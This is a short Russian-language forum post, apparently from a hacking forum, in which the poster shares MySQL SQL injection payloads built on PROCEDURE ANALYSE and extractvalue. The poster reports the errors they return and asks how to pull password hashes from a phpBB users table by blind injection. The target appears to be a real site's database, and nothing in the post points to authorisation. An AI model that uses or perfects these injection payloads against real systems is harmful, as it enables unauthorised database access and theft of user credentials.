27.10.2015, 17:50
|
|
Познавший АНТИЧАТ
Регистрация: 12.07.2010
Сообщений: 1,546
Провел на форуме:
344922
Репутация:
75
|
|
1) почитал обе статьи ( http://www.securitylab.ru/news/470546.php)
есть проблемы, например при запросе
Сообщение от None
+procedure+analyse(extractvalue(rand(),concat(0x3a ,version())),1)--+
пишет
Сообщение от None
FUNCTION dbphoto.extractvalue does not exist
как то решается эта проблема?
2) нашел нужные мне таблицу и колонку
Сообщение от None
+procedure+analyse((select+user_password+from+foru m.phpbb_users+limit+1,1),1)--+
тоесть ответ
Сообщение от None
Описание ошибки: Incorrect parameters to procedure 'analyse'
зх как составить запрос чтобы хотяб через блинд вывести данные
|
|
|